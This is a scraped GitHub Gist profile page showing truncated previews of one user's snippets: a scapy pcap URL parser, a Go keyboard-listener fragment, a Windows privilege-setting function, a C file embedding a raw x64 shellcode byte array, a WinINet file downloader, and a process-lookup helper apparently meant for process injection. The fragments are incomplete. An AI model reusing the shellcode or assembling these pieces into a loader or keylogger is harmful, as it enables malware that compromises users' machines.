Skip to content

Instantly share code, notes, and snippets.

View Procrastinator20's full-sized avatar

Procrastinator20

View GitHub Profile
import sys
import re
from scapy.all import *
from memory_profiler import profile
@profile
def get_url_from_payload(payload):
http_header_regex = r"(?P<name>.*?): (?P<value>.*?)\r\n"
start = payload.index(b"GET ") +4
@Procrastinator20
Procrastinator20 / rdpcap()
Last active August 5, 2023 13:28
rdpcap()
import sys
import re
from scapy.all import *
from memory_profiler import profile
@profile
def get_url_from_payload(payload):
http_header_regex = r"(?P<name>.*?): (?P<value>.*?)\r\n"
start = payload.index(b"GET ") +4
package main
// Импорт необходимых пакетов
import (
"fmt"
"os"
"os/signal"
"syscall"
"github.com/MichaelGatesDev/keyboard"
)
#include <windows.h>
#include <stdio.h>
#include <iostream>
// set privilege
BOOL setPrivilege(LPCTSTR priv) {
HANDLE token;
TOKEN_PRIVILEGES tp;
LUID luid;
BOOL res = TRUE;
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
unsigned char payload[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
#include <windows.h>
#include <iostream>
#include <string.h>
#include <wininet.h>
#pragma comment (lib, "wininet.lib")
using namespace std;
bool downloadFile(const string& url, const string& filepath) {
#include <windows.h>
#include <iostream>
#include <tlhelp32.h>
#include "download.h"
using namespace std;
typedef LPVOID Memory;
int getPIDbyProcName(const char* procName) {